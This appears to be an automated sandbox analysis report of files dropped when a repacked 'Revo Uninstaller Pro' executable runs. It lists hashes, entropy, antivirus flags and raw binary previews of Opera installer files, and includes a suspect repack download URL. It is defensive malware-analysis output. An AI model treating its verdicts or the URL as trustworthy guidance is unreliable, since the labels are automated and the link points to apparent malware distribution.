                                                                                                                                            Preview: ...h..$...n.y].o~....(...G..\.....%..c..<..`......*..../p...N.?H.K....*...c.1~.K...No.yF...$..u..1z..-....>..1.jT=.....t....m.45`D.).w..d]m..F....s3=..6.#.....F...*j.Z..^...:\).......?..f39.$E.F.&....L)..*$dQ.F..T..j.p..h@..b..Qd..H.gO.q..>.....WA...[...P...Jf....".....KV.,.,D_I.b,._..r..g....B.I.....F..Dh3...4..Bg..........P.,y....9B.\..).7...v..d:.b...L........ ?._. .>o..@q......K.........\...jv;.......{}....UH..J/.|..1.g"N.#PRB.c...D..=d.g.........9.....h.%i...-Q55....W...1g.[.=]..<$.4..]7K.Y.T.....q....1...s....N. EC.E.Ov.S..G.YE....g.......U..]...c..<...........2W.'..2.!....AE$@..H........8A.\.H.f.x\.|o.z.u%9.X...u>7....\'.VX.5=HR.."D~Y...9...r3.u.3...........jL...m`...d..vA...Q.l^.....8=.F.0.l..eg;b.....H.CwjbV3.... N............@.o.m.R..|n.e.\.......6..._.p.....r..U..Ha......r...)..%.qeg..(o..;...H....L*6.-...I.Q..V....b>Z.z.n.0!...O&..#.`..8.......y:..M..S........v..a;E\d.].!.7.....2M.$,...&..lu...)...U..i...P4..8.*1..6..k.
                                                                                                                                            Process:C:\Windows\System32\runonce.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):24576
                                                                                                                                            Entropy (8bit):2.0764594067753155
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:jQHNNkTIhl2UUooDDLyeo3JkwzAvS3ZE/kiF/hcvLwGqOjoF8GayaQupnMJP7E4r:jR
                                                                                                                                            MD5:8BB9716E539DBF0AEC99899A6B8DD3E9
                                                                                                                                            SHA1:7BB357E82C226028A2728CE164EB070BFD2A554B
                                                                                                                                            SHA-256:F52F7593DBF72AA12E21391E470911EAD8BDEFB9922E801E0CAC07AB333445B5
                                                                                                                                            SHA-512:C1FEE5DDF66B8D94D3245F4F53578E4417F6E4E554F8D1CDC8038F1E1E367B309BF6DE039A3E0FE293216C3866709A17F3E19CC5E278CAE7E7B932D8A92258A9
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:. ..................................................................................|....9............... ......eJ..........XJ..Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1...........................................................`k..b............L..XJ..........E.x.p.l.o.r.e.r.S.t.a.r.t.u.p.L.o.g._.R.u.n.O.n.c.e...C.:.\.U.s.e.r.s.\.t.i.n.a.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.E.x.p.l.o.r.e.r.\.E.x.p.l.o.r.e.r.S.t.a.r.t.u.p.L.o.g._.R.u.n.O.n.c.e...e.t.l.............P.P.....|....8..............................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2227280
                                                                                                                                            Entropy (8bit):7.916292078000363
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:49152:2VAbw0dQH5x+E1Q9AA06OT9S7+rICzXNagRt532Z8JtX:yAJdi3+ZN06+Nzdn5w8n
                                                                                                                                            MD5:43D37A6E0FE6E9824DFD80221E6AAD13
                                                                                                                                            SHA1:C0413529476272EF942F5CE48187974C060E5DFF
                                                                                                                                            SHA-256:6C7EC72B5223501E376688CECE1DFADDA6DE77209F15439945129B7F5428D4B0
                                                                                                                                            SHA-512:37FB9001682974DF2E2DF02C1362C96AF42BE933AB1F714E3737D1E7280F789778C54E4A11651F94993617F0742826376CB76507158F8E5B49655EA9C5D9EB73
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N....m...m...m..A....m..A....m...._m.....m.....m..A....m..A....m...m...m....\m....X..m...m0..m.....m..Rich.m..........PE..L.....if...............'..........................@..................................."...@.................................H...d.......p.............!..+.......1...C...............................C..@...............0............................text............................... ..`.rdata..z...........................@..@.data....K..........................@....rsrc...p...........................@..@.reloc...1.......2..................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe
                                                                                                                                            File Type:JSON data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1768
                                                                                                                                            Entropy (8bit):4.387813928994183
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:YqRyRrRs2RDtRCRa7jRzRMR9R89R/R5DR3RoRXsRWEIiRTRRR4RbR8xRSRGjRIjv:FCFVDjS49QzqZ5NhMXwWELd3c18XiWMd
                                                                                                                                            MD5:9C6D510D7C361909745710CFD3E10106
                                                                                                                                            SHA1:FB4E8BA3F4EFDA5CA35C7BEDED0410A40003FB6E
                                                                                                                                            SHA-256:27BA82B595C219C0FA8422555E0507119EFF0C229D3E6D8D70EB40010322FBF7
                                                                                                                                            SHA-512:C1A114BBF6F3CAD808F291BEE3981DEDD751A57EE839A1BCDBB7D2EE2D1592BC3269786BB09AC5E06F7B0F1D88BFA0C08F8A50D65B2FC4C1DB6B094C7AE4D724
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:{"features":{"01979299c8cd":{"state":"enabled"},"03b8357e5a08":{"state":"enabled"},"06fbbd0b7bf7":{"state":"enabled"},"0f9cf8758bcc":{"state":"disabled"},"1c4dddb65bac":{"state":"enabled"},"1d24dceb937a":{"state":"enabled"},"2114dc8bd72a":{"state":"enabled"},"26f7e2d59ecf":{"state":"enabled"},"278deecb29a1":{"state":"enabled"},"3389f6c15eb9":{"state":"enabled"},"3993848b2bd9":{"state":"enabled"},"3fc0872a857b":{"state":"enabled"},"40db6e644d2c":{"state":"disabled"},"50796754ffc7":{"state":"enabled"},"5448a57d6689":{"state":"disabled"},"54a846ecd4f2":{"state":"enabled"},"56d717ae3ad6":{"state":"enabled"},"5a28d66c82cd":{"state":"enabled"},"5aceda74693f":{"state":"enabled"},"5ee708e89d7b":{"state":"disabled"},"603cade21cf7":{"state":"enabled"},"654296fe9d6c":{"state":"enabled"},"6713f3df0bed":{"state":"enabled"},"804beb213cf7":{"state":"enabled"},"818c3ef12d0b":{"state":"enabled","dna_filter":{"required_dna":["64336fb81a04836eb8108d24fbca3aa3682db0a5"],"forbidden_dna":["5b3eb4a6c335a0659
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):419886
                                                                                                                                            Entropy (8bit):7.320460842483817
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:q/iQb+ckQsH8TDRGKJkSvGUlYG2EY8NqK9XXHJoPNKAZzOndNyLMfjRxXdS:5Qnk3GDYKGcblBY8Y23mZ0dYmV0
                                                                                                                                            MD5:A868E9C0A97C2EF80602C0F6634913F8
                                                                                                                                            SHA1:9E3F70A600DDC17D018612B08854F702E24AE5D3
                                                                                                                                            SHA-256:691DF930404FB3CB974F183C849C4B1EDDC63EC3BCA579EEE24F8A59E702FE11
                                                                                                                                            SHA-512:611D06A34D007CB4D321400A318BA727B07971916F7207EF7D0D45383B7DC38361EA296904646F9079D9C42D87BD375F500D969BF9AA9C6906472655D84E6EF1
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 30%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...,...._......._..'...._f.'...._..'...Rich&...................PE..L....}|^..................................... ....@..................................D....@.........................@...4...t...<.... ..''...................P...!.....T............................B..@............ ..`...... ....................text............................... ..`.rdata..2.... ......................@..@.data....8..........................@....gfids..............................@..@.rsrc...''... ...(..................@..@.reloc...!...P..."..................@..B........................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):31822848
                                                                                                                                            Entropy (8bit):7.99964019043844
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:786432:J51VbF0ZYe+/4l0aSJAmhdidmunuJH2XXCzQSBsC7d:n7yZY5/4lwimbCtaWcBs8
                                                                                                                                            MD5:8C69A7261DEEDDA409FEE047BECEB349
                                                                                                                                            SHA1:C800F3951228A00B737DB409F6E228F81B4C00C1
                                                                                                                                            SHA-256:E1B650EBDCAAFA894F98D3BD61754DBAA635AE2E6DCF3C90B408A1AD25E4FED8
                                                                                                                                            SHA-512:21ADB1A4A48C2967DB5CD66E5E2EFC21330B5543C9B079C54825B719A77311A8F20D25B0806EA17E0795687FC06661C17FF0111A16FF8BCFE5C7E019FD002858
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......(2S&lS=ulS=ulS=u'+>t`S=u'+8t.S=u..8tAS=u..9t.S=u..>tyS=u'+9tyS=u'+<teS=ulS<u.S=u..5t:S=u...umS=ulS.umS=u..?tmS=uRichlS=u........PE..L...4.if...............'..........................@................................./.&...@..................................R..d....................y&..).......&......................................@............................................text............................... ..`.rdata..............................@..@.data....A...`.......J..............@....rsrc................`..............@..@.reloc...&.......(...j..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):35
                                                                                                                                            Entropy (8bit):4.036006945330954
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:N8MfXFLVt:2ghVt
                                                                                                                                            MD5:9D1787D69C72AE1531A6EFE6C058EBFA
                                                                                                                                            SHA1:847875E77AF8048EDF1A8A6D732D48F2A9B5CC96
                                                                                                                                            SHA-256:8C041E42595D9BF69B3293050B297A4BE644F57162DD362CA9C0E2EC15CE538D
                                                                                                                                            SHA-512:9A8CA8DFDEF274561C467B50C837C4BCA2A632995CEF8EDB565FA2872D4BD952EFD2EA0BDF32DA252CA0F949704245B8D335F1737B35F4D71ED35ADEFEE8F7C8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:https://mail.repack.me/tsjtmfdm.pkg
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2228
                                                                                                                                            Entropy (8bit):5.377524745892739
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:gPWSU4y4RQmFoUeWmfgZ9tK8NPZHYs7u1iMuge//8vUyus:oLHyIFKL3IZ2KRHnOugMs
                                                                                                                                            MD5:1780C010278B6426194BC6A53B9C0AB7
                                                                                                                                            SHA1:5316AD6B86650DB63909DC72E5971A3324ADD37B
                                                                                                                                            SHA-256:775E4845DE268465238A57A17DDFC051F2CF2D87BB676E2BEC443A969FAA96D2
                                                                                                                                            SHA-512:2BBE361AFF6ACFE887FA5CDFB735C7C59F85A355CE8331D18A729E7CB5FF4B996D700D74CBF69160800264AA69BE4BA7CA6414C6EA780DF821E6B2C6483E2F99
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):31822848
                                                                                                                                            Entropy (8bit):7.99964019043844
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:786432:J51VbF0ZYe+/4l0aSJAmhdidmunuJH2XXCzQSBsC7d:n7yZY5/4lwimbCtaWcBs8
                                                                                                                                            MD5:8C69A7261DEEDDA409FEE047BECEB349
                                                                                                                                            SHA1:C800F3951228A00B737DB409F6E228F81B4C00C1
                                                                                                                                            SHA-256:E1B650EBDCAAFA894F98D3BD61754DBAA635AE2E6DCF3C90B408A1AD25E4FED8
                                                                                                                                            SHA-512:21ADB1A4A48C2967DB5CD66E5E2EFC21330B5543C9B079C54825B719A77311A8F20D25B0806EA17E0795687FC06661C17FF0111A16FF8BCFE5C7E019FD002858
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......(2S&lS=ulS=ulS=u'+>t`S=u'+8t.S=u..8tAS=u..9t.S=u..>tyS=u'+9tyS=u'+<teS=ulS<u.S=u..5t:S=u...umS=ulS.umS=u..?tmS=uRichlS=u........PE..L...4.if...............'..........................@................................./.&...@..................................R..d....................y&..).......&......................................@............................................text............................... ..`.rdata..............................@..@.data....A...`.......J..............@....rsrc................`..............@..@.reloc...&.......(...j..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5740952
                                                                                                                                            Entropy (8bit):6.869655224466312
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:98304:Y5hxwD6666666666666666666666666666666x666666666666666fwwwwwwwwwt:H3gRKPR+UIYbL8v515oa7IC
                                                                                                                                            MD5:F9DA76E8D7DB633AB031EE5AC59BB55E
                                                                                                                                            SHA1:ACD4E95365DBD1256B8DDAA747C82AD8EF3D85CD
                                                                                                                                            SHA-256:2A4E429693A6DA362CD89967271831B99C88F0C6F696946E66852969D883233B
                                                                                                                                            SHA-512:76BBBD271182109E501482A23D136DA0C8A4669664A9B284C7C8249870D1CE47191BEFA69D668719B63225211A4F9DB8B63E3BAB41D5F35C33455B4D18832513
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....Ng.........."......d....S...................@...........................W.....t.X...@.................................8%..P.........Q..........pW..)....W..6...".......................!.......................'...............................text...;b.......d.................. ..`.rdata...............h..............@..@.data...$5...P.......8..............@....tls.................V..............@....rsrc.....Q.......Q..X..............@..@.reloc...6....W..8...8W.............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe
                                                                                                                                            File Type:ASCII text, with very long lines (1610)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5574
                                                                                                                                            Entropy (8bit):5.7340486197201335
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:EXuK//L7gmkBUST5E7nDM3pnklTc//MEgUTl+60XLNO:+uK/lkfT5ELDM3pnklg/+UTl+vLk
                                                                                                                                            MD5:020AE0DAA5916B1800513A8CE522A275
                                                                                                                                            SHA1:1192BE49BD5E290FF6CD1B8A40650174EA74972F
                                                                                                                                            SHA-256:67638D9F3310DB3046A7BF536CA142BF57B0C537E80D5D93BC67443958518AEC
                                                                                                                                            SHA-512:585C886336C157A05CD50EFBB68DA3035D0E64418B52ED4C5AA1B458654738CB31A36158C3F5BB945139DC6A1C32809190816F121750C62F052A8781CE239E8C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:[1209/114003.209:INFO:installer_main.cc(475)] Opera installer starting - version 115.0.5322.77 Stable.[1209/114003.209:INFO:installer_main.cc(478)] Command line: "C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe" --silent --allusers=0 --server-tracking-blob=NWM4YWUzOWQyNTkwZGNkMDZiZDFlODcxMDg5YWFhOTYzNGRjMWI4Njg0MWE5OGMxZDBhOGNkY2I2N2FlOTg3ZTp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cz91dG1fc291cmNlPURXTkxTVCZ1dG1fbWVkaXVtPWFwYiZ1dG1fY2FtcGFpZ249cjEwIiwidGltZXN0YW1wIjoiMTczMzc2MjM5OC4xNDI4IiwidXNlcmFnZW50IjoiTlNJU19JbmV0YyAoTW96aWxsYSkiLCJ1dG0iOnsiY2FtcGFpZ24iOiJyMTAiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJEV05MU1QifSwidXVpZCI6IjVlOWNkMGQ0LWE0NjMtNDMxNy05NTg0LTU2ZDIwN2Y0ZWE3NCJ9.[1209/114003.225:INFO:installer_main.cc(500)] Uninstall:0.[1209/114003.225:INFO:installer_main.cc(501)] Silent:1.[1209/114003.225:INFO:installer_main.cc(502)] Run Immediately0.[1209/114003.225:INFO:installer_main.cc(504)] B
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe
                                                                                                                                            File Type:ASCII text, with very long lines (1569)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2992
                                                                                                                                            Entropy (8bit):5.677553613250637
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:abb4hXrb7wZU6QM3wZLOgqwZdLnMfcVBJTleVnZ/Q5VEb67CZwt3MbLfXwZ7bmbB:LXzDM3pnklTc//MEgUdAxgUPSLP
                                                                                                                                            MD5:BFFE7237DB5A3CA7AEFE80E8B4F8EB1F
                                                                                                                                            SHA1:FCF9C72EB121BF293314E843150C392EF2F1E90A
                                                                                                                                            SHA-256:AF1DA756B3DA7FDE72892EA3BD1B5866B3694816E10C9F784251992E0D5337B6
                                                                                                                                            SHA-512:2AC3AFF782A6D369DC88BA0F43BA6F03D8E3F668F6BBDF68D9EE8329736B695CB26D91E1B7F9FD989CC3C5A412FB7AAAA3050E5AB3880EB0B77D79584E388006
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:[1209/114005.402:INFO:installer_main.cc(475)] Opera installer starting - version 115.0.5322.77 Stable.[1209/114005.402:INFO:installer_main.cc(478)] Command line: "C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --showunbox=0 --installfolder="C:\Users\user\AppData\Local\Programs\Opera" --profile-folder --language=en-GB --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3532 --package-dir-prefix="C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20241209114004" --session-guid=00c18248-fcc9-4b6b-a8b7-0c50518d9022 --server-tracking-blob=MWZkNGE2YjNhYTYzYjQxNzE2YmZkZTM0YzhlOTRjYTQ1ODNlOGY3ODRmYzMyNmQ3ZDRj
                                                                                                                                            Process:C:\Users\user\Downloads\OperaSetup.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5740952
                                                                                                                                            Entropy (8bit):6.869655224466312
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:98304:Y5hxwD6666666666666666666666666666666x666666666666666fwwwwwwwwwt:H3gRKPR+UIYbL8v515oa7IC
                                                                                                                                            MD5:F9DA76E8D7DB633AB031EE5AC59BB55E
                                                                                                                                            SHA1:ACD4E95365DBD1256B8DDAA747C82AD8EF3D85CD
                                                                                                                                            SHA-256:2A4E429693A6DA362CD89967271831B99C88F0C6F696946E66852969D883233B
                                                                                                                                            SHA-512:76BBBD271182109E501482A23D136DA0C8A4669664A9B284C7C8249870D1CE47191BEFA69D668719B63225211A4F9DB8B63E3BAB41D5F35C33455B4D18832513
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....Ng.........."......d....S...................@...........................W.....t.X...@.................................8%..P.........Q..........pW..)....W..6...".......................!.......................'...............................text...;b.......d.................. ..`.rdata...............h..............@..@.data...$5...P.......8..............@....tls.................V..............@....rsrc.....Q.......Q..X..............@..@.reloc...6....W..8...8W.............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe
                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5189528
                                                                                                                                            Entropy (8bit):6.8622234075396875
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:98304:T6666666666666666666666666666666x666666666666666fwwwwwwwwwwwwwwL:H3gRKPR+UIYbL8v515oa7I3
                                                                                                                                            MD5:11054504E4BFC58D4E36F5799797FC09
                                                                                                                                            SHA1:6DB3FFCD7771E4B153C63872A3711D3EFEA2495A
                                                                                                                                            SHA-256:BFD03E0DC2A9ADDD6FDB8FBB1309B7C72C708CF931ED9FB83849BD658C37437A
                                                                                                                                            SHA-512:7E978B663CF75B31CD067E16136F9062918081E8AD5060709EA95EB08B7922B0A4090718C694D1A0A77DEEF0A8550984AB01A54EADE3950FFF2D359AB1717E2B
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....Ng.........."!.....68...........(.......................................P.....{aO...@A..........................@.m.....@.......C.8=............O..)...PO.t....J@.....................@J@.....8W8...............@.$.....@.`....................text....48......68................. ..`.rdata......P8......:8.............@..@.data...<.....A..B....@.............@....rodata.......B...... A............. ..`.tls..........B......"A.............@...CPADinfo0.....B......$A.............@...malloc_h......C......&A............. ..`.rsrc...8=....C..>...(A.............@..@.reloc..t....PO......fM.............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe
                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5189528
                                                                                                                                            Entropy (8bit):6.8622234075396875
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:98304:T6666666666666666666666666666666x666666666666666fwwwwwwwwwwwwwwL:H3gRKPR+UIYbL8v515oa7I3
                                                                                                                                            MD5:11054504E4BFC58D4E36F5799797FC09
                                                                                                                                            SHA1:6DB3FFCD7771E4B153C63872A3711D3EFEA2495A
                                                                                                                                            SHA-256:BFD03E0DC2A9ADDD6FDB8FBB1309B7C72C708CF931ED9FB83849BD658C37437A
                                                                                                                                            SHA-512:7E978B663CF75B31CD067E16136F9062918081E8AD5060709EA95EB08B7922B0A4090718C694D1A0A77DEEF0A8550984AB01A54EADE3950FFF2D359AB1717E2B
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....Ng.........."!.....68...........(.......................................P.....{aO...@A..........................@.m.....@.......C.8=............O..)...PO.t....J@.....................@J@.....8W8...............@.$.....@.`....................text....48......68................. ..`.rdata......P8......:8.............@..@.data...<.....A..B....@.............@....rodata.......B...... A............. ..`.tls..........B......"A.............@...CPADinfo0.....B......$A.............@...malloc_h......C......&A............. ..`.rsrc...8=....C..>...(A.............@..@.reloc..t....PO......fM.............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe
                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5189528
                                                                                                                                            Entropy (8bit):6.8622234075396875
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:98304:T6666666666666666666666666666666x666666666666666fwwwwwwwwwwwwwwL:H3gRKPR+UIYbL8v515oa7I3
                                                                                                                                            MD5:11054504E4BFC58D4E36F5799797FC09
                                                                                                                                            SHA1:6DB3FFCD7771E4B153C63872A3711D3EFEA2495A
                                                                                                                                            SHA-256:BFD03E0DC2A9ADDD6FDB8FBB1309B7C72C708CF931ED9FB83849BD658C37437A
                                                                                                                                            SHA-512:7E978B663CF75B31CD067E16136F9062918081E8AD5060709EA95EB08B7922B0A4090718C694D1A0A77DEEF0A8550984AB01A54EADE3950FFF2D359AB1717E2B
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....Ng.........."!.....68...........(.......................................P.....{aO...@A..........................@.m.....@.......C.8=............O..)...PO.t....J@.....................@J@.....8W8...............@.$.....@.`....................text....48......68................. ..`.rdata......P8......:8.............@..@.data...<.....A..B....@.............@....rodata.......B...... A............. ..`.tls..........B......"A.............@...CPADinfo0.....B......$A.............@...malloc_h......C......&A............. ..`.rsrc...8=....C..>...(A.............@..@.reloc..t....PO......fM.............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe
                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5189528
                                                                                                                                            Entropy (8bit):6.8622234075396875
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:98304:T6666666666666666666666666666666x666666666666666fwwwwwwwwwwwwwwL:H3gRKPR+UIYbL8v515oa7I3
                                                                                                                                            MD5:11054504E4BFC58D4E36F5799797FC09
                                                                                                                                            SHA1:6DB3FFCD7771E4B153C63872A3711D3EFEA2495A
                                                                                                                                            SHA-256:BFD03E0DC2A9ADDD6FDB8FBB1309B7C72C708CF931ED9FB83849BD658C37437A
                                                                                                                                            SHA-512:7E978B663CF75B31CD067E16136F9062918081E8AD5060709EA95EB08B7922B0A4090718C694D1A0A77DEEF0A8550984AB01A54EADE3950FFF2D359AB1717E2B
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....Ng.........."!.....68...........(.......................................P.....{aO...@A..........................@.m.....@.......C.8=............O..)...PO.t....J@.....................@J@.....8W8...............@.$.....@.`....................text....48......68................. ..`.rdata......P8......:8.............@..@.data...<.....A..B....@.............@....rodata.......B...... A............. ..`.tls..........B......"A.............@...CPADinfo0.....B......$A.............@...malloc_h......C......&A............. ..`.rsrc...8=....C..>...(A.............@..@.reloc..t....PO......fM.............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe
                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5189528
                                                                                                                                            Entropy (8bit):6.8622234075396875
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:98304:T6666666666666666666666666666666x666666666666666fwwwwwwwwwwwwwwL:H3gRKPR+UIYbL8v515oa7I3
                                                                                                                                            MD5:11054504E4BFC58D4E36F5799797FC09
                                                                                                                                            SHA1:6DB3FFCD7771E4B153C63872A3711D3EFEA2495A
                                                                                                                                            SHA-256:BFD03E0DC2A9ADDD6FDB8FBB1309B7C72C708CF931ED9FB83849BD658C37437A
                                                                                                                                            SHA-512:7E978B663CF75B31CD067E16136F9062918081E8AD5060709EA95EB08B7922B0A4090718C694D1A0A77DEEF0A8550984AB01A54EADE3950FFF2D359AB1717E2B
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....Ng.........."!.....68...........(.......................................P.....{aO...@A..........................@.m.....@.......C.8=............O..)...PO.t....J@.....................@J@.....8W8...............@.$.....@.`....................text....48......68................. ..`.rdata......P8......:8.............@..@.data...<.....A..B....@.............@....rodata.......B...... A............. ..`.tls..........B......"A.............@...CPADinfo0.....B......$A.............@...malloc_h......C......&A............. ..`.rsrc...8=....C..>...(A.............@..@.reloc..t....PO......fM.............@..B................................................................................................................................................................................................................................................................................
